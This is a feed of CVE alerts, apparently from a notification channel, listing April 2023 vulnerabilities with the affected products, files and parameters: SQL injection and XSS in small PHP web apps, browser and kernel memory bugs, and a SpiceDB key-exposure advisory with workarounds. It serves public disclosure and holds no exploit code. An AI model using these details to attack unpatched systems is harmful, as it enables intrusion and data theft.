| 2023-04-15 15:58:14 |
🚨 CVE-2023-2099A vulnerability classified as problematic has been found in SourceCodester Vehicle Service Management System 1.0. This affects an unknown part of the file /classes/Users.php. The manipulation of the argument id leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-226107.🎖@cveNotify |
|
| 2023-04-15 12:59:09 |
🚨 CVE-2023-2094A vulnerability has been found in SourceCodester Vehicle Service Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/mechanics/manage_mechanic.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-226102 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-15 12:59:08 |
🚨 CVE-2023-2095A vulnerability was found in SourceCodester Vehicle Service Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/maintenance/manage_category.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-226103.🎖@cveNotify |
|
| 2023-04-15 12:59:07 |
🚨 CVE-2023-2096A vulnerability was found in SourceCodester Vehicle Service Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/service_requests/manage_inventory.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-226104.🎖@cveNotify |
|
| 2023-04-15 12:59:06 |
🚨 CVE-2023-2092A vulnerability, which was classified as critical, has been found in SourceCodester Vehicle Service Management System 1.0. Affected by this issue is some unknown functionality of the file view_service.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-226100.🎖@cveNotify |
|
| 2023-04-15 12:59:05 |
🚨 CVE-2023-2093A vulnerability, which was classified as critical, was found in SourceCodester Vehicle Service Management System 1.0. This affects an unknown part of the file /classes/Login.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226101 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-15 10:59:13 |
🚨 CVE-2023-2090A vulnerability classified as critical has been found in SourceCodester Employee and Visitor Gate Pass Logging System 1.0. Affected is an unknown function of the file /admin/maintenance/view_designation.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226098 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-15 10:59:12 |
🚨 CVE-2023-2091A vulnerability classified as critical was found in KylinSoft youker-assistant. Affected by this vulnerability is the function adjust_cpufreq_scaling_governer. The manipulation leads to os command injection. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. Upgrading to version 3.1.4.13 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-226099.🎖@cveNotify |
|
| 2023-04-15 10:59:11 |
🚨 CVE-2023-2027The ZM Ajax Login & Register plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.0.2. This is due to insufficient verification on the user being supplied during a Facebook login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.🎖@cveNotify |
|
| 2023-04-15 10:59:10 |
🚨 CVE-2023-2089A vulnerability was found in SourceCodester Complaint Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/userprofile.php of the component GET Parameter Handler. The manipulation of the argument uid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226097 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-15 06:59:35 |
🚨 CVE-2023-28879In Artifex Ghostscript through 10.01.0, there is a buffer overflow leading to potential corruption of data internal to the PostScript interpreter, in base/sbcp.c. This affects BCPEncode, BCPDecode, TBCPEncode, and TBCPDecode. If the write buffer is filled to one byte less than full, and one then tries to write an escaped character, two bytes are written.🎖@cveNotify |
|
| 2023-04-15 06:59:34 |
🚨 CVE-2023-28755A ReDoS issue was discovered in the URI component through 0.12.0 in Ruby through 3.2.1. The URI parser mishandles invalid URLs that have specific characters. It causes an increase in execution time for parsing strings to URI objects. The fixed versions are 0.12.1, 0.11.1, 0.10.2 and 0.10.0.1.🎖@cveNotify |
|
| 2023-04-15 06:59:33 |
🚨 CVE-2023-1393A flaw was found in X.Org Server Overlay Window. A Use-After-Free may lead to local privilege escalation. If a client explicitly destroys the compositor overlay window (aka COW), the Xserver would leave a dangling pointer to that window in the CompScreen structure, which will trigger a use-after-free later.🎖@cveNotify |
|
| 2023-04-15 06:59:32 |
🚨 CVE-2022-43634This vulnerability allows remote attackers to execute arbitrary code on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the dsi_writeinit function. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-17646.🎖@cveNotify |
|
| 2023-04-15 06:59:28 |
🚨 CVE-2023-1528Use after free in Passwords in Google Chrome prior to 111.0.5563.110 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-15 06:59:27 |
🚨 CVE-2023-1529Out of bounds memory access in WebHID in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a malicious HID device. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-15 06:59:26 |
🚨 CVE-2023-1531Use after free in ANGLE in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-15 06:59:22 |
🚨 CVE-2023-1533Use after free in WebProtect in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-15 06:59:21 |
🚨 CVE-2023-1534Out of bounds read in ANGLE in Google Chrome prior to 111.0.5563.110 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-15 06:59:20 |
🚨 CVE-2022-45188Netatalk through 3.1.13 has an afp_getappl heap-based buffer overflow resulting in code execution via a crafted .appl file. This provides remote root access on some platforms such as FreeBSD (used for TrueNAS).🎖@cveNotify |
|
| 2023-04-15 06:59:16 |
🚨 CVE-2023-27572An issue was discovered in CommScope Arris DG3450 Cable Gateway AR01.02.056.18_041520_711.NCS.10. A reflected XSS vulnerability was discovered in the https_redirect.php web page via the page parameter.🎖@cveNotify |
|
| 2023-04-15 06:59:15 |
🚨 CVE-2023-22669Parsing of DWG files in Open Design Alliance Drawings SDK before 2023.6 lacks proper validation of the length of user-supplied XRecord data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.🎖@cveNotify |
|
| 2023-04-15 06:59:14 |
🚨 CVE-2023-24607Qt before 6.4.3 allows a denial of service via a crafted string when the SQL ODBC driver plugin is used and the size of SQLTCHAR is 4. The affected versions are 5.x before 5.15.13, 6.x before 6.2.8, and 6.3.x before 6.4.3.🎖@cveNotify |
|
| 2023-04-15 00:58:28 |
🚨 CVE-2023-0465Applications that use a non-default option when verifying certificates may bevulnerable to an attack from a malicious CA to circumvent certain checks.Invalid certificate policies in leaf certificates are silently ignored byOpenSSL and other certificate policy checks are skipped for that certificate.A malicious CA could use this to deliberately assert invalid certificate policiesin order to circumvent policy checking on the certificate altogether.Policy processing is disabled by default but can be enabled by passingthe `-policy' argument to the command line utilities or by calling the`X509_VERIFY_PARAM_set1_policies()' function.🎖@cveNotify |
|
| 2023-04-15 00:58:27 |
🚨 CVE-2022-44687Raw Image Extension Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-04-15 00:58:26 |
🚨 CVE-2022-44699Azure Network Watcher Agent Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-04-15 00:58:22 |
🚨 CVE-2022-46709A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 16. An app may be able to execute arbitrary code with kernel privileges🎖@cveNotify |
|
| 2023-04-15 00:58:21 |
🚨 CVE-2023-26495An issue was discovered in Open Design Alliance Drawings SDK before 2024.1. A crafted DWG file can force the SDK to reuse an object that has been freed. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code.🎖@cveNotify |
|
| 2023-04-15 00:58:20 |
🚨 CVE-2022-46717A logic issue was addressed with improved restrictions. This issue is fixed in iOS 16.2 and iPadOS 16.2. A user with physical access to a locked Apple Watch may be able to view user photos via accessibility features🎖@cveNotify |
|
| 2023-04-15 00:58:19 |
🚨 CVE-2023-26466A user with non-Admin access can change a configuration file on the client to modify the Server URL.🎖@cveNotify |
|
| 2023-04-15 00:58:15 |
🚨 CVE-2023-27076Command injection vulnerability found in Tenda G103 v.1.0.0.5 allows attacker to execute arbitrary code via a the language parameter.🎖@cveNotify |
|
| 2023-04-15 00:58:14 |
🚨 CVE-2023-29383In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.🎖@cveNotify |
|
| 2023-04-15 00:58:13 |
🚨 CVE-2023-2075A vulnerability classified as critical has been found in Campcodes Online Traffic Offense Management System 1.0. This affects an unknown part of the file /admin/offenses/view_details.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226053 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-14 22:58:39 |
🚨 CVE-2023-29086An issue was discovered in Exynos Mobile Processor, Automotive Processor and Modem for Exynos Modem 5123, Exynos Modem 5300, Exynos 980, Exynos 1080, Exynos 9110, and Exynos Auto T5123. Memory corruption can occur due to insufficient parameter validation while decoding an SIP Min-SE header.🎖@cveNotify |
|
| 2023-04-14 22:58:38 |
🚨 CVE-2023-29087An issue was discovered in Exynos Mobile Processor, Automotive Processor and Modem for Exynos Modem 5123, Exynos Modem 5300, Exynos 980, Exynos 1080, Exynos 9110, and Exynos Auto T5123. Memory corruption can occur due to insufficient parameter validation while decoding an SIP Retry-After header.🎖@cveNotify |
|
| 2023-04-14 22:58:36 |
🚨 CVE-2023-29088An issue was discovered in Exynos Mobile Processor, Automotive Processor and Modem for Exynos Modem 5123, Exynos Modem 5300, Exynos 980, Exynos 1080, Exynos 9110, and Exynos Auto T5123. Memory corruption can occur due to insufficient parameter validation while decoding an SIP Session-Expires header.🎖@cveNotify |
|
| 2023-04-14 22:58:35 |
🚨 CVE-2023-29089An issue was discovered in Exynos Mobile Processor, Automotive Processor and Modem for Exynos Modem 5123, Exynos Modem 5300, Exynos 980, Exynos 1080, Exynos 9110, and Exynos Auto T5123. Memory corruption can occur due to insufficient parameter validation while decoding SIP multipart messages.🎖@cveNotify |
|
| 2023-04-14 22:58:34 |
🚨 CVE-2023-29090An issue was discovered in Exynos Mobile Processor, Automotive Processor and Modem for Exynos Modem 5123, Exynos Modem 5300, Exynos 980, Exynos 1080, Exynos 9110, and Exynos Auto T5123. Memory corruption can occur due to insufficient parameter validation while decoding an SIP Via header.🎖@cveNotify |
|
| 2023-04-14 22:58:32 |
🚨 CVE-2023-29091An issue was discovered in Exynos Mobile Processor, Automotive Processor and Modem for Exynos Modem 5123, Exynos Modem 5300, Exynos 980, Exynos 1080, Exynos 9110, and Exynos Auto T5123. Memory corruption can occur due to insufficient parameter validation while decoding an SIP URI.🎖@cveNotify |
|
| 2023-04-14 22:58:31 |
🚨 CVE-2023-2004An integer overflow vulnerability was discovered in Freetype in tt_hvadvance_adjust() function in src/truetype/ttgxvar.c.🎖@cveNotify |
|
| 2023-04-14 22:58:29 |
🚨 CVE-2023-2008A flaw was found in the Linux kernel's udmabuf device driver. The specific flaw exists within a fault handler. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an array. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel.🎖@cveNotify |
|
| 2023-04-14 22:58:28 |
🚨 CVE-2023-23926APOC (Awesome Procedures on Cypher) is an add-on library for Neo4j. An XML External Entity (XXE) vulnerability found in the apoc.import.graphml procedure of APOC core plugin prior to version 5.5.0 and 4.4.0.14 (4.4 branch) in Neo4j graph database. XML External Entity (XXE) injection occurs when the XML parser allows external entities to be resolved. The XML parser used by the apoc.import.graphml procedure was not configured in a secure way and therefore allowed this. External entities can be used to read local files, send HTTP requests, and perform denial-of-service attacks on the application. Abusing the XXE vulnerability enabled assessors to read local files remotely. Although with the level of privileges assessors had this was limited to one-line files. With the ability to write to the database, any file could have been read. Additionally, assessors noted, with local testing, the server could be crashed by passing in improperly formatted XML. The minimum version containing a patch for this vulnerability is 5.5.0. Those who cannot upgrade the library can control the allowlist of the procedures that can be used in your system.🎖@cveNotify |
|
| 2023-04-14 22:58:26 |
🚨 CVE-2023-2074A vulnerability was found in Campcodes Online Traffic Offense Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /classes/Master.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-226052.🎖@cveNotify |
|
| 2023-04-14 22:58:25 |
🚨 CVE-2023-2075A vulnerability classified as critical has been found in Campcodes Online Traffic Offense Management System 1.0. This affects an unknown part of the file /admin/offenses/view_details.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226053 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-14 22:58:24 |
🚨 CVE-2022-46886There exists an open redirect within the response list update functionality of ServiceNow. This allows attackers to redirect users to arbitrary domains when clicking on a URL within a service-now domain.🎖@cveNotify |
|
| 2023-04-14 22:58:22 |
🚨 CVE-2023-27647An issue found in DUALSPACE Lock Master v.2.2.4 allows a local attacker to cause a denial of service or gain sensitive information via the com.ludashi.superlock.util.pref.SharedPrefProviderEntryMethod: insert of the android.net.Uri.insert method.🎖@cveNotify |
|
| 2023-04-14 22:58:21 |
🚨 CVE-2023-27654An issue found in WHOv.1.0.28, v.1.0.30, v.1.0.32 allows an attacker to cause a escalation of privileges via the TTMultiProvider component.🎖@cveNotify |
|
| 2023-04-14 22:58:19 |
🚨 CVE-2023-29193SpiceDB is an open source, Google Zanzibar-inspired, database system for creating and managing security-critical application permissions. The `spicedb serve` command contains a flag named `--grpc-preshared-key` which is used to protect the gRPC API from being accessed by unauthorized requests. The values of this flag are to be considered sensitive, secret data. The `/debug/pprof/cmdline` endpoint served by the metrics service (defaulting running on port `9090`) reveals the command-line flags provided for debugging purposes. If a password is set via the `--grpc-preshared-key` then the key is revealed by this endpoint along with any other flags provided to the SpiceDB binary. This issue has been fixed in version 1.19.1.### ImpactAll deployments abiding by the recommended best practices for production usage are **NOT affected**:- Authzed's SpiceDB Serverless- Authzed's SpiceDB Dedicated- SpiceDB OperatorUsers configuring SpiceDB via environment variables are **NOT affected**.Users **MAY be affected** if they expose their metrics port to an untrusted network and are configuring `--grpc-preshared-key` via command-line flag.### PatchesTODO### WorkaroundsTo workaround this issue you can do one of the following:- Configure the preshared key via an environment variable (e.g. `SPICEDB_GRPC_PRESHARED_KEY=yoursecret spicedb serve`)- Reconfigure the `--metrics-addr` flag to bind to a trusted network (e.g. `--metrics-addr=localhost:9090`)- Disable the metrics service via the flag (e.g. `--metrics-enabled=false`)- Adopt one of the recommended deployment models: [Authzed's managed services](https://authzed.com/pricing) or the [SpiceDB Operator](https://github.com/authzed/spicedb-operator)### References- [GitHub Security Advisory issued for SpiceDB](https://github.com/authzed/spicedb/security/advisories/GHSA-cjr9-mr35-7xh6)- [Go issue #22085](https://github.com/golang/go/issues/22085) for documenting the risks of exposing pprof to the internet- [Go issue #42834](https://github.com/golang/go/issues/42834) discusses preventing pprof registration to the default serve mux- [semgrep rule go.lang.security.audit.net.pprof.pprof-debug-exposure](https://semgrep.dev/r?q=go.lang.security.audit.net.pprof) checks for a variation of this issue### CreditWe'd like to thank Amit Laish, a security researcher at GE Vernova for responsibly disclosing this vulnerability.🎖@cveNotify |
|
| 2023-04-14 22:58:18 |
🚨 CVE-2023-2076A vulnerability classified as problematic was found in Campcodes Online Traffic Offense Management System 1.0. This vulnerability affects unknown code of the file /classes/Users.phpp. The manipulation of the argument id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-226054 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-14 22:58:17 |
🚨 CVE-2023-2077A vulnerability, which was classified as problematic, has been found in Campcodes Online Traffic Offense Management System 1.0. This issue affects some unknown processing of the file /admin/offenses/view_details.php. The manipulation of the argument id leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-226055.🎖@cveNotify |
|
| 2023-04-14 22:58:15 |
🚨 CVE-2023-30535Snowflake JDBC provides a JDBC type 4 driver that supports core functionality, allowing Java program to connect to Snowflake. Users of the Snowflake JDBC driver were vulnerable to a command injection vulnerability. An attacker could set up a malicious, publicly accessible server which responds to the SSO URL with an attack payload. If the attacker then tricked a user into visiting the maliciously crafted connection URL, the user’s local machine would render the malicious payload, leading to a remote code execution. The vulnerability was patched on March 17, 2023 as part of Snowflake JDBC driver Version 3.13.29. All users should immediately upgrade the Snowflake JDBC driver to the latest version: 3.13.29.🎖@cveNotify |
|
| 2023-04-14 22:58:14 |
🚨 CVE-2022-47027Timmystudios Fast Typing Keyboard v1.275.1.162 allows unauthorized apps to overwrite arbitrary files in its internal storage via a dictionary traversal vulnerability and achieve arbitrary code execution.🎖@cveNotify |
|
| 2023-04-14 22:58:13 |
🚨 CVE-2023-26750** DISPUTED ** SQL injection vulnerability found in Yii Framework Yii 2 Framework before v.2.0.47 allows the a remote attacker to execute arbitrary code via the runAction function. NOTE: the software maintainer's position is that the vulnerability is in third-party code, not in the framework.🎖@cveNotify |
|
| 2023-04-14 21:58:19 |
🚨 CVE-2022-31251A Incorrect Default Permissions vulnerability in the packaging of the slurm testsuite of openSUSE Factory allows local attackers with control over the slurm user to escalate to root. This issue affects: openSUSE Factory slurm versions prior to 22.05.2-3.3.🎖@cveNotify |
|
| 2023-04-14 21:58:15 |
🚨 CVE-2023-24721A cross-site scripting (XSS) vulnerability in LiveAction LiveSP v21.1.2 allows attackers to execute arbitrary web scripts or HTML.🎖@cveNotify |
|
| 2023-04-14 21:58:14 |
🚨 CVE-2022-21950A Improper Access Control vulnerability in the systemd service of cana in openSUSE Backports SLE-15-SP3, openSUSE Backports SLE-15-SP4 allows local users to hijack the UNIX domain socket This issue affects: openSUSE Backports SLE-15-SP3 canna versions prior to canna-3.7p3-bp153.2.3.1. openSUSE Backports SLE-15-SP4 canna versions prior to 3.7p3-bp154.3.3.1. openSUSE Factory was also affected. Instead of fixing the package it was deleted there.🎖@cveNotify |
|
| 2023-04-14 21:58:13 |
🚨 CVE-2021-25317A Incorrect Default Permissions vulnerability in the packaging of cups of SUSE Linux Enterprise Server 11-SP4-LTSS, SUSE Manager Server 4.0, SUSE OpenStack Cloud Crowbar 9; openSUSE Leap 15.2, Factory allows local attackers with control of the lp users to create files as root with 0644 permissions without the ability to set the content. This issue affects: SUSE Linux Enterprise Server 11-SP4-LTSS cups versions prior to 1.3.9. SUSE Manager Server 4.0 cups versions prior to 2.2.7. SUSE OpenStack Cloud Crowbar 9 cups versions prior to 1.7.5. openSUSE Leap 15.2 cups versions prior to 2.2.7. openSUSE Factory cups version 2.3.3op2-2.1 and prior versions.🎖@cveNotify |
|
| 2023-04-14 21:58:12 |
🚨 CVE-2021-25314A Creation of Temporary File With Insecure Permissions vulnerability in hawk2 of SUSE Linux Enterprise High Availability 12-SP3, SUSE Linux Enterprise High Availability 12-SP5, SUSE Linux Enterprise High Availability 15-SP2 allows local attackers to escalate to root. This issue affects: SUSE Linux Enterprise High Availability 12-SP3 hawk2 versions prior to 2.6.3+git.1614685906.812c31e9. SUSE Linux Enterprise High Availability 12-SP5 hawk2 versions prior to 2.6.3+git.1614685906.812c31e9. SUSE Linux Enterprise High Availability 15-SP2 hawk2 versions prior to 2.6.3+git.1614684118.af555ad9.🎖@cveNotify |
|
| 2023-04-14 19:58:43 |
🚨 CVE-2022-47467In telecom service, there is a missing permission check. This could lead to local denial of service in telecom service.🎖@cveNotify |
|
| 2023-04-14 19:58:42 |
🚨 CVE-2022-47468In telecom service, there is a missing permission check. This could lead to local denial of service in telecom service.🎖@cveNotify |
|
| 2023-04-14 19:58:41 |
🚨 CVE-2022-47466In telecom service, there is a missing permission check. This could lead to local denial of service in telecom service.🎖@cveNotify |
|
| 2023-04-14 19:58:40 |
🚨 CVE-2023-26919delight-nashorn-sandbox 0.2.4 and 0.2.5 is vulnerable to sandbox escape. When allowExitFunctions is set to false, the loadWithNewGlobal function can be used to invoke the exit and quit methods to exit the Java process.🎖@cveNotify |
|
| 2023-04-14 19:58:39 |
🚨 CVE-2023-28240Windows Network Load Balancing Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-04-14 19:58:35 |
🚨 CVE-2023-28238Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-04-14 19:58:34 |
🚨 CVE-2023-27650An issue found in APUS Group Launcher v.3.10.73 and v.3.10.88 allows a remote attacker to execute arbitrary code via the FONT_FILE parameter.🎖@cveNotify |
|
| 2023-04-14 19:58:33 |
🚨 CVE-2023-26986An issue in China Mobile OA Mailbox PC v2.9.23 allows remote attackers to execute arbitrary commands on a victim host via user interaction with a crafted EML file sent to their OA mailbox.🎖@cveNotify |
|
| 2023-04-14 19:58:32 |
🚨 CVE-2023-1969A vulnerability classified as critical was found in SourceCodester Online Eyewear Shop 1.0. This vulnerability affects unknown code of the file /admin/inventory/manage_stock.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-225406 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-14 19:58:31 |
🚨 CVE-2023-24626socket.c in GNU Screen through 4.9.0, when installed setuid or setgid (the default on platforms such as Arch Linux and FreeBSD), allows local users to send a privileged SIGHUP signal to any PID, causing a denial of service or disruption of the target process.🎖@cveNotify |
|
| 2023-04-14 19:58:27 |
🚨 CVE-2023-1801The SMB protocol decoder in tcpdump version 4.99.3 can perform an out-of-bounds write when decoding a crafted network packet.🎖@cveNotify |
|
| 2023-04-14 19:58:26 |
🚨 CVE-2023-28244Windows Kerberos Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-04-14 19:58:25 |
🚨 CVE-2023-28500** UNSUPPORTED WHEN ASSIGNED ** A Java insecure deserialization vulnerability in Adobe LiveCycle ES4 version 11.0 and earlier allows unauthenticated remote attackers to gain operating system code execution by submitting specially crafted Java serialized objects to a specific URL. Adobe LiveCycle ES4 version 11.0.1 and later may be vulnerable if the application is installed with Java environment 7u21 and earlier. Exploitation of the vulnerability depends on two factors: insecure deserialization methods used in the Adobe LiveCycle application, and the use of Java environments 7u21 and earlier. The code execution is performed in the context of the account that is running the Adobe LiveCycle application. If the account is privileged, exploitation provides privileged access to the operating system. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-04-14 19:58:24 |
🚨 CVE-2022-47465In vdsp service, there is a missing permission check. This could lead to local denial of service in vdsp service.🎖@cveNotify |
|
| 2023-04-14 19:58:23 |
🚨 CVE-2023-28234Windows Secure Channel Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-04-14 19:58:19 |
🚨 CVE-2023-28243Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-04-14 19:58:18 |
🚨 CVE-2022-47501Arbitrary file reading vulnerability in Apache Software Foundation Apache OFBiz when using the Solr plugin. This is a pre-authentication attack.This issue affects Apache OFBiz: before 18.12.07.🎖@cveNotify |
|
| 2023-04-14 19:58:17 |
🚨 CVE-2022-47464In telecom service, there is a missing permission check. This could lead to local denial of service in telecom service.🎖@cveNotify |
|
| 2023-04-14 19:58:16 |
🚨 CVE-2022-47463In telecom service, there is a missing permission check. This could lead to local denial of service in telecom service.🎖@cveNotify |
|
| 2023-04-14 14:58:35 |
🚨 CVE-2023-2054A vulnerability, which was classified as critical, was found in Campcodes Advanced Online Voting System 1.0. This affects an unknown part of the file /admin/positions_delete.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225939.🎖@cveNotify |
|
| 2023-04-14 14:58:34 |
🚨 CVE-2023-2055A vulnerability has been found in Campcodes Advanced Online Voting System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/config_save.php. The manipulation of the argument title leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225940.🎖@cveNotify |
|
| 2023-04-14 14:58:33 |
🚨 CVE-2023-27643An issue found in POWERAMP 925-bundle-play and Poweramp 954-uni allows a remote attacker to cause a denial of service via the Rescan button in Queue and Select Folders button in Library🎖@cveNotify |
|
| 2023-04-14 14:58:32 |
🚨 CVE-2023-27666Auto Dealer Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the name parameter at /classes/SystemSettings.php?f=update_settings.🎖@cveNotify |
|
| 2023-04-14 14:58:31 |
🚨 CVE-2023-29584mp4v2 v2.0.0 was discovered to contain a heap buffer overflow via the MP4GetVideoProfileLevel function at /src/mp4.cpp.🎖@cveNotify |
|
| 2023-04-14 14:58:27 |
🚨 CVE-2023-2050A vulnerability was found in Campcodes Advanced Online Voting System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/positions_add.php. The manipulation of the argument description leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225935.🎖@cveNotify |
|
| 2023-04-14 14:58:26 |
🚨 CVE-2022-47027Timmystudios Fast Typing Keyboard v1.275.1.162 allows unauthorized apps to overwrite arbitrary files in its internal storage via a dictionary traversal vulnerability and achieve arbitrary code execution.🎖@cveNotify |
|
| 2023-04-14 14:58:25 |
🚨 CVE-2023-26756The login page of Revive Adserver v5.4.1 is vulnerable to brute force attacks.🎖@cveNotify |
|
| 2023-04-14 14:58:21 |
🚨 CVE-2023-27193An issue found in DUALSPACE v.1.1.3 allows a local attacker to gain privileges via the key_ad_new_user_avoid_time field.🎖@cveNotify |
|
| 2023-04-14 14:58:20 |
🚨 CVE-2023-27648Directory Traversal vulnerability found in T-ME Studios Change Color of Keypad v.1.275.1.277 allows a remote attacker to execute arbitrary code via the dex file in the internal storage.🎖@cveNotify |
|
| 2023-04-14 14:58:19 |
🚨 CVE-2023-27651An issue found in Ego Studio SuperClean v.1.1.9 and v.1.1.5 allows an attacker to gain privileges via the update_info field of the _default_.xml file.🎖@cveNotify |
|
| 2023-04-14 14:58:18 |
🚨 CVE-2023-27653An issue found in WHOv.1.0.28, v.1.0.30, v.1.0.32 allows an attacker to cause a denial of service via the SharedPreference files.🎖@cveNotify |
|
| 2023-04-14 14:58:14 |
🚨 CVE-2023-2051A vulnerability classified as critical has been found in Campcodes Advanced Online Voting System 1.0. Affected is an unknown function of the file /admin/positions_row.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225936.🎖@cveNotify |
|
| 2023-04-14 14:58:13 |
🚨 CVE-2023-2042A vulnerability, which was classified as problematic, has been found in DataGear up to 4.5.1. Affected by this issue is some unknown functionality of the component JDBC Server Handler. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225920. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-04-14 14:58:12 |
🚨 CVE-2023-2044A vulnerability has been found in Control iD iDSecure 4.7.29.1 and classified as problematic. This vulnerability affects unknown code of the component Dispositivos Page. The manipulation of the argument IP-DNS leads to cross site scripting. The attack can be initiated remotely. VDB-225922 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-04-14 12:58:20 |
🚨 CVE-2023-2047A vulnerability was found in Campcodes Advanced Online Voting System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file login.php. The manipulation of the argument voter leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225932.🎖@cveNotify |
|
| 2023-04-14 12:58:16 |
🚨 CVE-2023-2048A vulnerability was found in Campcodes Advanced Online Voting System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/voters_row.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-225933 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-14 12:58:15 |
🚨 CVE-2023-2049A vulnerability was found in Campcodes Advanced Online Voting System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/ballot_up.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-225934 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-14 12:58:14 |
